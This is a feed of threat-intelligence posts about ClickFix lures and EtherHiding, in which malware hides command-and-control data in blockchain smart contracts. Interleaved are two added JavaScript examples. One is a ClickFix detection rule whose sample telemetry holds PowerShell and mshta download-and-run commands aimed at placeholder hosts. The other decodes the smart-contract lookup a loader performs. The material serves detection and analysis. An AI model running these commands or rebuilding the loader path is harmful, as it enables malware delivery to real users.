Botnet Trojan delivered through ClickFix and EtherHiding

Pulse ID: 69a757a872a0ab148da31e83
Pulse Link: https://otx.alienvault.com/pulse/69a757a872a0ab148da31e83
Pulse Author: Tr1sa111
Created: 2026-03-03 21:50:32

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#CyberSecurity #EtherHiding #InfoSec #OTX #OpenThreatExchange #Trojan #bot #botnet #Tr1sa111

LevelBlue - Open Threat Exchange

A novel method, dubbed "#EtherHiding", turns the #Ethereum #cryptocurrency #blockchain into an offensive arsenal. #Google's #cybersecurity #researchers are sounding the #alarm over this #technological escalation www.futura-sciences.com/tech/actuali...

The blockchain is no longer safe: this hack from North Korea is worrying

Cybercriminals working for North Korea have developed a sophisticated technique to conceal their malicious programs: they now exploit the Ethereum blockchain as a digital refuge. This novel method, dubbed "EtherHiding", turns the decentralized cryptocurrency infrastructure into an offensive arsenal. Cybersecurity researchers are sounding the alarm over this technological escalation.

Futura

Botnet Trojan delivered through ClickFix and EtherHiding

A sophisticated phishing campaign impersonating Tesseract OCR was discovered, utilizing typosquatting and ClickFix techniques. The attack chain, named OCRFix, employed multi-stage malware deployments with heavy obfuscation and defense evasion techniques, including EtherHiding. The campaign used BNB Smart Chain TestNet to hide C2 domains through smart contracts. The malware delivery process involved three stages: a loader, a secondary loader for persistence, and a bot listener. The final payload connected to a bot control panel, allowing attackers to manage infected hosts and deploy additional malware. The campaign demonstrated a combination of simple initial access methods with complex delivery chains, highlighting the ongoing effectiveness of techniques like ClickFix and the importance of robust phishing defenses.

Pulse ID: 69a163c992e9afc70efc55d7
Pulse Link: https://otx.alienvault.com/pulse/69a163c992e9afc70efc55d7
Pulse Author: AlienVault
Created: 2026-02-27 09:28:41

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#CyberSecurity #EtherHiding #InfoSec #Malware #OTX #OpenThreatExchange #Phishing #RAT #Trojan #TypoSquatting #bot #botnet #AlienVault

📢 Expel describes an evolution of ClearFake/ClickFix that hosts its payloads via smart contracts
📝 Source and context: Expel (blog, Marcus Hutchins, 20 Jan.
📖 cyberveille: https://cyberveille.ch/posts/2026-01-22-expel-decrit-une-evolution-de-clearfake-clickfix-qui-heberge-ses-charges-via-des-smart-contracts/
🌐 source: https://expel.com/blog/clearfake-new-lotl-techniques/
#ClearFake #EtherHiding #Cyberveille
Expel describes an evolution of ClearFake/ClickFix that hosts its payloads via smart contracts

Source and context: Expel (blog, Marcus Hutchins, 20 Jan. 2026) publishes a technical analysis of the ClearFake/ClickFix malware campaign, active on hundreds of compromised sites and focused on defense evasion. • What ClearFake does: a malicious JavaScript framework injected into hacked sites that displays a fake "ClickFix" CAPTCHA prompting the user to press Win+R and then paste and run a command, which triggers the infection. The JS chain is obfuscated and stages later payloads.

CyberVeille
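The ClickFix step in the Expel write-up above (fake CAPTCHA, Win+R, paste a command) leaves a recognisable trace: the interpreter is started by explorer.exe with the pasted text as its command line. The following triage rule is an added example, not code from Expel, ClearFake or any of the posts above. The event field names, the marker list and the sample events are this example's own assumptions (a Sysmon-style process-creation record written as JSON, with constructed data), not a real telemetry format or real captures.

```javascript
// Added example: triage rule for ClickFix-style "paste this into Win+R" lures.
// Field names (host, user, parent_image, image, command_line) and all sample
// events are assumptions constructed for this example, not real telemetry.

const RUN_DIALOG_PARENT = "explorer.exe";

// Interpreters and LOLBins a lure can have the victim type into the Run dialog.
const INTERPRETERS = new Set([
  "powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe",
]);

// Substrings that suggest the pasted one-liner fetches or decodes a next stage.
// Heuristic list, not an exhaustive signature.
const STAGING_MARKERS = [
  /\biex\b/i, /invoke-expression/i, /\birm\b/i, /invoke-webrequest/i, /invoke-restmethod/i,
  /downloadstring/i, /frombase64string/i, /-enc(odedcommand)?\b/i, /\bmshta\b.*https?:/i,
  /\bcurl\b.*https?:/i, /\bcertutil\b.*-urlcache/i,
];

// "-w hidden" / "-WindowStyle Hidden": the lure does not want the victim to see the console.
const HIDE_WINDOW = /-w(indowstyle)?\s+h(idden)?\b/i;

function basename(path) {
  return String(path).split(/[\\/]/).pop().toLowerCase();
}

// Score one process-creation event. Returns null when it does not look like a
// ClickFix launch, otherwise a record with the reasons so an analyst sees why it fired.
function scoreClickFix(evt) {
  const reasons = [];
  if (basename(evt.parent_image) === RUN_DIALOG_PARENT && INTERPRETERS.has(basename(evt.image))) {
    reasons.push("interpreter spawned by explorer.exe (Run dialog / pasted command)");
  } else {
    return null; // the explorer.exe -> interpreter pair is the precondition
  }
  const cmd = evt.command_line || "";
  if (STAGING_MARKERS.some((re) => re.test(cmd))) reasons.push("command line fetches or decodes a payload");
  if (HIDE_WINDOW.test(cmd)) reasons.push("console window hidden from the user");
  // Precondition alone is not enough: a user running notepad or a plain script from
  // Win+R is normal. Require at least one behavioural marker on top.
  if (reasons.length < 2) return null;
  return { host: evt.host, user: evt.user, image: evt.image, command_line: cmd, reasons };
}

function scanEvents(events) {
  return events.map(scoreClickFix).filter(Boolean);
}

// Constructed sample telemetry; none of it is real.
const SAMPLE_EVENTS = [
  { host: "ws01", user: "alice", parent_image: "C:\\Windows\\explorer.exe",
    image: "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    command_line: "powershell -w hidden -c \"iex (irm https://lure.example.invalid/verify)\"" },
  { host: "ws01", user: "alice", parent_image: "C:\\Windows\\explorer.exe",
    image: "C:\\Windows\\System32\\notepad.exe", command_line: "notepad.exe" },
  { host: "ws02", user: "bob", parent_image: "C:\\Program Files\\PowerShell\\7\\pwsh.exe",
    image: "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    command_line: "powershell -File C:\\scripts\\nightly.ps1" },
  { host: "ws03", user: "carol", parent_image: "C:\\Windows\\explorer.exe",
    image: "C:\\Windows\\System32\\mshta.exe",
    command_line: "mshta https://lure.example.invalid/captcha.hta" },
];

console.log(JSON.stringify(scanEvents(SAMPLE_EVENTS), null, 2));
```

The parent/child pair is the cheap, high-signal part; the marker list is where tuning happens, and any real deployment would pair it with the Run dialog's own history (RunMRU) and the clipboard-to-console timing rather than rely on command-line strings alone.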
#wordpress: There is a new hacking trick for smuggling in a malware launcher: EtherHiding. The attackers use smart contracts that live on a blockchain, which means the malicious code cannot be deleted. How exactly it works:
https://www.goneo.de/blog/2025/10/20/%f0%9f%9a%a8-achtung-deine-wordpress-seite-als-malware-launcher-dank-etherhiding/ #hacking #etherhiding

EtherHiding emerges as a malware delivery mechanism!

Google threat intelligence is reporting North Korean nation-state actor "UNC5342" is leveraging transactions on public blockchains to store and retrieve malicious payloads.

EtherHiding executes a social engineering campaign (fake job interviews, crypto games) as the initial compromise to lure developers — often those working in the cryptocurrency or tech industries — into downloading malware disguised as job-related files or coding challenges.

Once a target opens the file, a malicious script connects to a public blockchain like BNB Smart Chain or Ethereum, to retrieve encrypted code from a smart contract. That code installs a JadeSnow loader, which in turn delivers a more persistent backdoor known as InvisibleFerret that has been used in multiple cryptocurrency thefts.

https://cloud.google.com/blog/topics/threat-intelligence/dprk-adopts-etherhiding #Security #CyberSecurity #Hackers #CyberAttack #UNC5342 #Google #Malware #SmartContracts #Crypto #CryptoCurrency #EtherHiding #SocialEngineering #BlockChain
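The OCRFix pulse above (C2 domains hidden in a contract on BNB Smart Chain TestNet) and the UNC5342 post above (a script that contacts BNB Smart Chain or Ethereum to retrieve code from a contract) describe the same read path. The following is an added example, not code from any of these posts or from Google, LevelBlue or Expel: it builds the `eth_call` JSON-RPC request such a loader sends and decodes the ABI-encoded string the contract returns, which is also what a defender does with a captured response. The RPC endpoint, contract address and function selector are placeholders assumed for the example, and the "captured" response is constructed inline.

```javascript
// Added example (not from any post above): the read-only JSON-RPC call an
// EtherHiding-style loader uses to pull a value out of a smart contract, and a
// defensive decoder for the ABI-encoded string in the response. RPC_URL,
// CONTRACT and SELECTOR are placeholders assumed for this example; the sample
// response is constructed below, not captured from a campaign.

const RPC_URL = "https://rpc.example.invalid";   // assumed placeholder endpoint
const CONTRACT = "0x" + "ab".repeat(20);          // assumed placeholder contract address
// First 4 bytes of keccak256 of the getter's signature. Hard-coded because Node's
// crypto module has no Keccak-256; the value is illustrative only.
const SELECTOR = "0x6d4ce63c";

// The request the loader sends: a free, read-only call. No transaction, no gas,
// and nothing written on chain that could be traced or revoked.
function buildEthCall(contract, selector) {
  return {
    jsonrpc: "2.0",
    id: 1,
    method: "eth_call",
    params: [{ to: contract, data: selector }, "latest"],
  };
}

// ABI-encode a dynamic `string` return value: offset word, length word, then the
// UTF-8 bytes padded to a 32-byte boundary. Used here only to build the sample.
function abiEncodeString(s) {
  const data = Buffer.from(s, "utf8");
  const padding = Buffer.alloc((32 - (data.length % 32)) % 32);
  const word = (n) => n.toString(16).padStart(64, "0");
  return "0x" + word(32) + word(data.length) + Buffer.concat([data, padding]).toString("hex");
}

// Decode that layout defensively: malformed hex, an offset or a length pointing
// past the buffer must throw rather than read garbage.
function abiDecodeString(hex) {
  if (typeof hex !== "string" || !/^0x([0-9a-fA-F]{64})+$/.test(hex)) {
    throw new Error("result is not a whole number of 32-byte ABI words");
  }
  const bytes = Buffer.from(hex.slice(2), "hex");
  const wordAt = (i) => BigInt("0x" + bytes.subarray(i, i + 32).toString("hex"));
  const offset = wordAt(0);
  if (offset + 32n > BigInt(bytes.length)) throw new Error("string offset out of range");
  const start = Number(offset) + 32;
  const length = wordAt(Number(offset));
  if (BigInt(start) + length > BigInt(bytes.length)) throw new Error("string length out of range");
  return bytes.subarray(start, start + Number(length)).toString("utf8");
}

// Pull the hidden value out of a JSON-RPC response (object or raw JSON text).
function extractPayload(rpcResponse) {
  const msg = typeof rpcResponse === "string" ? JSON.parse(rpcResponse) : rpcResponse;
  if (msg.error) throw new Error("RPC error: " + JSON.stringify(msg.error));
  return abiDecodeString(msg.result);
}

// Rough triage of what came back: a next-stage URL, inline script, or something
// opaque (encrypted/encoded) that only the loader's own key can turn into code.
function classifyPayload(payload) {
  if (/^https?:\/\/\S+$/i.test(payload)) return "url";
  if (/<script|\beval\s*\(|\bfunction\s*\(|\batob\s*\(/i.test(payload)) return "script";
  return "opaque";
}

// Constructed sample: what a contract hiding a C2 domain would return.
const HIDDEN_C2 = "https://c2.example.invalid/stage2";
const SAMPLE_RESPONSE = JSON.stringify({ jsonrpc: "2.0", id: 1, result: abiEncodeString(HIDDEN_C2) });

console.log("request to", RPC_URL, JSON.stringify(buildEthCall(CONTRACT, SELECTOR)));
const payload = extractPayload(SAMPLE_RESPONSE);
console.log("decoded:", payload, "->", classifyPayload(payload));
```

Because `eth_call` never touches chain state, the only defensive chokepoints are the RPC endpoint the page or loader talks to (an unusual destination for a marketing site's JavaScript) and the decoded value itself, which is what the decoder and `classifyPayload` give an analyst to act on.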

North Korean state-sponsored hackers are embedding malware within public blockchains to steal cryptocurrency, a technique called "EtherHiding." Malicious JavaScript payloads are hidden inside smart contracts, making them effectively unremovable.
Read more: https://www.tomshardware.com/tech-industry/cyber-security/north-korea-hiding-malware-inside-blockchain-smart-contracts
#Cybersecurity #Malware #NorthKorea #Hacking #Blockchain #Crypto #Cryptocurrency #EtherHiding #SmartContracts #CyberAttack #TechNews
North Korean state-sponsored hackers slip unremovable malware inside blockchains to steal cryptocurrency — EtherHiding embeds malicious JavaScript payloads in smart contracts on public blockchains

Google reports DPRK group UNC5342 uses EtherHiding to deliver backdoors and steal crypto, marking the first nation-state use of a tactic designed for resistant attacks.

Tom's Hardware
North Korean #hackers, tracked as #UNC5342, are using the #EtherHiding technique to hide #malware on the #blockchain. This technique, first described by Guardio Labs, allows the threat actor to host #maliciousscripts within #smartcontracts on the Binance Smart Chain or Ethereum, making it difficult to track and disrupt campaigns. https://www.bleepingcomputer.com/news/security/north-korean-hackers-use-etherhiding-to-hide-malware-on-the-blockchain/?eicker.news #tech #media #news
North Korean hackers use EtherHiding to hide malware on the blockchain

North Korean hackers were observed employing the 'EtherHiding' tactic to deliver malware, steal cryptocurrency, and perform espionage with stealth and resilience.

BleepingComputer

North Korean hackers are taking stealth to a new level: embedding malware into blockchain smart contracts and tricking devs with fake job interviews. Are we ready for a world where your next code review could be a trap?

https://thedefendopsdiaries.com/north-korean-hackers-leverage-etherhiding-malware-distribution-via-blockchain-smart-contracts/

#etherhiding
#northkoreanhackers
#blockchainsecurity
#malwaredistribution
#smartcontracts
#cyberthreats
#socialengineering
#infosec